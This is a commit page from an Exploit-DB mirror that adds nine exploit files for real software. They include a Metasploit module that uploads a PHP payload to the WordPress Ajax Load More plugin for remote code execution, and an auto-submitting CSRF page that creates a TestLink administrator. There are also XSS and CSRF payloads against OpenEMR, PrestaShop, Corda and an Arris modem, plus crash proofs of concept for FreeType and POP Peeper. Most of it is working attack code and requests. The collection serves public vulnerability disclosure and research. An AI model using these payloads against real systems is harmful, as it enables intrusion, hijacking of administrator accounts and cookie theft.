bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-11-10

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-11-10 05:03:39 +00:00
parent 979bf80ebc
commit 8a3d4b8a4b
10 changed files with 492 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -34921,3 +34921,12 @@ id,file,description,date,author,platform,type,port
38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0
38653,platforms/asp/webapps/38653.txt,"Corda Highwire 'Highwire.ashx' File Path Disclosure Vulnerability",2013-07-12,"Adam Willard",asp,webapps,0
38654,platforms/php/webapps/38654.txt,"OpenEMR <= 4.1 'note' Parameter HTML Injection Vulnerability",2013-07-12,"Nate Drier",php,webapps,0
38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector 'redirector.corda' Cross Site Scripting Vulnerability",2013-07-12,"Adam Willard",asp,webapps,0
38656,platforms/php/webapps/38656.html,"PrestaShop Multiple Cross Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0
38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS Vulnerability",2015-11-09,Nu11By73,hardware,webapps,0
38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0
38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More PHP Upload Vulnerability",2015-11-09,metasploit,php,remote,0
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - CSRF Vulnerability",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0
38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0

Can't render this file because it is too large.

7
platforms/asp/webapps/38653.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/61152/info
Corda Highwire is prone to a path disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
http://www.example.com/highwire.ashx?url=../../

9
platforms/asp/webapps/38655.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/61156/info
Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected.
http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN

26
platforms/hardware/webapps/38657.html Executable file
View file

@ -0,0 +1,26 @@
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT
Software Image Name:TG1682_2.0s7_PRODse
Advanced Services:TG1682G
Packet Cable:2.0
# Tested on: Default Install
-->
<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" / >
<input type="hidden" name="protocol" value="TCP" / >
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
</html>

111
platforms/multiple/dos/38662.txt Executable file
View file

@ -0,0 +1,111 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=614
The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compiled with AddressSanitizer:
$ ftbench <file>
Attached are three POC files which trigger the conditions.
---
$ freetype2-demos/bin/ftbench asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b
ftbench results for font `asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b'
-------------------------------------------------------------------------------------
family: (null)
style: (null)
number of seconds for each test: 2.000000
starting glyph index: 0
face size: 10ppem
font preloading into memory: no
load flags: 0x0
render mode: 0
CFF engine set to Adobe
TrueType engine set to version 35
maximum cache size: 1024KiByte
executing tests:
Load =================================================================
==22366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eb55 at pc 0x00000069e2fc bp 0x7fffc4670610 sp 0x7fffc4670608
READ of size 1 at 0x60200000eb55 thread T0
#0 0x69e2fb in tt_sbit_decoder_load_bit_aligned freetype2/src/sfnt/ttsbit.c:834:19
#1 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#2 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#3 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#4 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#5 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#6 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#7 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#8 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#9 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#10 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#11 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#12 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#13 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
0x60200000eb55 is located 0 bytes to the right of 5-byte region [0x60200000eb50,0x60200000eb55)
allocated by thread T0 here:
#0 0x4bc4a8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x756740 in ft_alloc freetype2/src/base/ftsystem.c:74:12
#2 0x51b4e7 in ft_mem_qalloc freetype2/src/base/ftutil.c:76:15
#3 0x51abb1 in FT_Stream_EnterFrame freetype2/src/base/ftstream.c:269:12
#4 0x51a800 in FT_Stream_ExtractFrame freetype2/src/base/ftstream.c:200:13
#5 0x69ccab in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1036:10
#6 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#7 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#8 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#9 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#10 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#11 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#12 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#13 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#14 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#15 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#16 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#17 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
SUMMARY: AddressSanitizer: heap-buffer-overflow freetype2/src/sfnt/ttsbit.c:834:19 in tt_sbit_decoder_load_bit_aligned
Shadow bytes around the buggy address:
0x0c047fff9d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9d60: fa fa fa fa fa fa fa fa fa fa[05]fa fa fa fd fa
0x0c047fff9d70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9d80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9d90: fa fa fd fa fa fa 04 fa fa fa 00 fa fa fa fd fa
0x0c047fff9da0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==22366==ABORTING
---
The issue was reported in https://savannah.nongnu.org/bugs/?46379.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38662.zip

122
platforms/php/remote/38660.rb Executable file
View file

@ -0,0 +1,122 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress Ajax Load More
version 2.8.1.1. It allows to upload arbitrary php files and get remote code
execution. This module has been tested successfully on WordPress Ajax Load More
2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
},
'Author' =>
[
'Unknown', # Identify yourself || send an PR here
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '8209']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Ajax Load More 2.8.1.1', {}]],
'DisclosureDate' => 'Oct 10 2015',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
], self.class
)
end
def check
check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
end
def username
datastore['WP_USERNAME']
end
def password
datastore['WP_PASSWORD']
end
def get_nonce(cookie)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
'vars_get' => {
'page' => 'ajax-load-more-repeaters'
},
'cookie' => cookie
)
if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
return Regexp.last_match[1]
else
return nil
end
end
def exploit
vprint_status("#{peer} - Trying to login as #{username}")
cookie = wordpress_login(username, password)
fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?
vprint_status("#{peer} - Trying to get nonce")
nonce = get_nonce(cookie)
fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?
vprint_status("#{peer} - Trying to upload payload")
# This must be default.php
filename = 'default.php'
print_status("#{peer} - Uploading payload")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
'vars_post' => {
'action' => 'alm_save_repeater',
'value' => payload.encoded,
'repeater' => 'default',
'type' => 'default',
'alias' => '',
'nonce' => nonce
},
'cookie' => cookie
)
if res
if res.code == 200 && res.body.include?('Template Saved Successfully')
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
end
else
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
print_status("#{peer} - Calling uploaded file")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
)
end
end

35
platforms/php/webapps/38654.txt Executable file
View file

@ -0,0 +1,35 @@
source: http://www.securityfocus.com/bid/61154/info
OpenEMR is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
OpenEMR 4.1.1 patch-12 and prior are vulnerable.
1. Misc > Office Notes ('note' parameter is vulnerable with a POST to
/openemr-4.1.1/interface/main/onotes/office_comments_full.php)
#Request:
POST http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
mode=new&offset=0&active=all&note=<script>alert(document.cookie)</script>
#Response:
<snip>
<tr><td><input type=hidden value='' name='act115' id='act115'><input name='box115' id='box115'
onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked></td><td><label
for='box115' class='bold'>Wed February 06th</label> <label for='box115' class='bold'>(test)</label></td><td><label
for='box115' class='text'><script>alert(document.cookie)</script>&nbsp;</label></td></tr>
<snip>

15
platforms/php/webapps/38656.html Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/61158/info
PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
PrestaShop 1.5.4 is vulnerable; other versions may also be affected.
<html>
<head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</head>
</html>

92
platforms/php/webapps/38661.txt Executable file
View file

@ -0,0 +1,92 @@
Information
=================================
Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed
Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)
CVE Reference:
=================================
Not assigned
Technical Details:
=================================
Even though the use of CSRF tokens are being implemented in the
application, they aren't properly
validated at the server side. This allows malicious requests to be
generated by the attacker and
get them processed by the server on behalf of the victim. By
exploiting the vulnerability,
the attacker will be able to create user accounts with administrator
privileges on the application.
Exploit Code
=================================
<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
Exploitation Technique:
===================================
Remote
Severity Level:
===================================
High
Advisory Timeline
===================================
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure
Solution
====================================
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487
Credits & Authors
====================================
Aravind C Ajayan, Balagopal N

66
platforms/windows/dos/38659.py Executable file
View file

@ -0,0 +1,66 @@
'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
EIP 20203029
==============================
STACK:
0012FBF4 41414141
0012FBF8 41414141
0012FBFC 41414141
0012FC00 41414141
0012FC04 41414141
0012FC08 909020EB Pointer to next SE>
0012FC0C 20203029 SE handler
0012FC10 43434343
0012FC14 43434343
0012FC18 43434343
0012FC1C 43434343
0012FC20 43434343
0012FC24 43434343
0012FC28 43434343
===============================
'''
[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Goto Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear,
enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt
5- Save as Draft, software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on Check Mail option, Software will crash.
Everytime you click on Check mail, it will crash as it will load the saved DRAFT.
[Code to produce CRASH.txt]
'''
buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''